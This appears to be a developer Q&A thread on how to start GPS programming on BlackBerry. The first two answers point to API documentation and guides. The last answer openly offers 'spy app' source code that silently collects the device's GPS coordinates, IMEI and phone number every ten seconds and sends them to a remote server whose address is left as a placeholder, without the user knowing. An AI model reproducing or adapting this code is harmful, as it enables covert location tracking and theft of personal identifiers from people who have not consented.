# How to start GPS program in blackberry?

Tags: blackberry, gps, jsr179

I want to how to create a GPS program in BlackBerry ?

Answer (score 3):

Use [javax.microedition.location](http://www.blackberry.com/developers/docs/4.5.0api/javax/microedition/location/package-summary.html)

See 
[BB Dev Lab - Introduction to Location-based Services (ZIP)](http://na.blackberry.com/developers/resources/LBS_LAB.zip)
[Toni Westbrook - Creating a Blackberry GPS Tracker](http://www.toniwestbrook.com/archives/126)
[riccomini - code blackberry gps](http://www.riccomini.name/Topics/Mobile/BlackBerry/BlackBerryGPS/)
[riccomini - code blackberry storm gps](http://www.riccomini.name/Topics/Mobile/BlackBerry/BlackBerryStormGPS/)

Also see blackberrymapsdemo and gpsdemo samples in 4.5/4.6 Eclipse plugin
(components\samples\com\rim\samples\device)

Answer (score 2):

If you’re doing GPS programming on a BlackBerry, there are two good sources of information:

1. [BlackBerry Developer Journal GPS overview](http://na.blackberry.com/eng/developers/resources/journals/jan_2006/blackberry_gps.jsp)
2. [GPS and BlackBerry Maps Development Guide](http://na.blackberry.com/eng/deliverables/1181/GPS%20and%20BlackBerry%20Maps%20Development%20Guide.pdf)

Source : http://blackberry.synclastic.com/blackberry-gps-programming/

Answer (score 0):

I have worked on a project where i have to make a spy app to send GPS location of the user to the server without knowing him here is the code for that i hope it may help you a little bit.

```
package mypackage;

import java.io.OutputStreamWriter;
import java.util.Date;
import java.util.Timer;
import java.util.TimerTask;

import javax.microedition.io.Connector;
import javax.microedition.io.SocketConnection;
import javax.microedition.location.LocationProvider;

import net.rim.blackberry.api.phone.Phone;
import net.rim.device.api.gps.BlackBerryCriteria;
import net.rim.device.api.gps.BlackBerryLocation;
import net.rim.device.api.gps.BlackBerryLocationProvider;
import net.rim.device.api.gps.GPSInfo;
import net.rim.device.api.i18n.SimpleDateFormat;
import net.rim.device.api.system.Application;
import net.rim.device.api.system.IDENInfo;
import net.rim.device.api.ui.component.Dialog;

public class MyApp extends Application
{
public BlackBerryCriteria _criteria;
public BlackBerryLocationProvider _locationProvider;
public BlackBerryLocation _location;
public SocketConnection socket;
double lat;
double lon;
public Timer _timer;
public TimerTask _timerTask;
public String _imei;
public Date date;
public String pNumber;

public static void main(String[] args)
{   
    MyApp theApp = new MyApp();       
    theApp.enterEventDispatcher();
}
public MyApp()
{               
    _imei = IDENInfo.imeiToString(IDENInfo.getIMEI());
    pNumber = Phone.getDevicePhoneNumber(true);
    _criteria = new BlackBerryCriteria();
    if(GPSInfo.isGPSModeAvailable(GPSInfo.GPS_MODE_AUTONOMOUS)){
    _criteria.setMode(GPSInfo.GPS_MODE_AUTONOMOUS);
    }else{
        Dialog.alert("GPS not Available");
    }
    _timer = new Timer();
    _timerTask = new TimerTask(){
        public void run() {

            try{
                String currentdate = new SimpleDateFormat("yy/MM/dd").format(new Date(System.currentTimeMillis()));

                _criteria.setHorizontalAccuracy(5);
                _criteria.setVerticalAccuracy(5);
                _criteria.setPreferredResponseTime(10000);
                _locationProvider = (BlackBerryLocationProvider)LocationProvider.getInstance(_criteria);
                _location= (BlackBerryLocation)_locationProvider.getLocation(-1);
                lat =_location.getQualifiedCoordinates().getLatitude();
                lon = _location.getQualifiedCoordinates().getLongitude();   
                String url = "<your IP address with port no(Format: 000.000.000.000:Port>;deviceside = false";
                socket = (SocketConnection)Connector.open(url,Connector.READ_WRITE); 
                socket.setSocketOption(SocketConnection.KEEPALIVE,1);
                OutputStreamWriter _out = new OutputStreamWriter(socket.openOutputStream());
                String data = pNumber+"##"+_imei+"##"+lat+"##"+lon+"##"+currentdate+"##";
                int length = data.length();
                _out.write(data,0,length);
                _out.close();
                socket.close();
            }catch(Exception e){
                Dialog.alert(e.toString());
            }
        }
    }; 
   _timer.scheduleAtFixedRate(_timerTask, 0,10000);
}    
}
```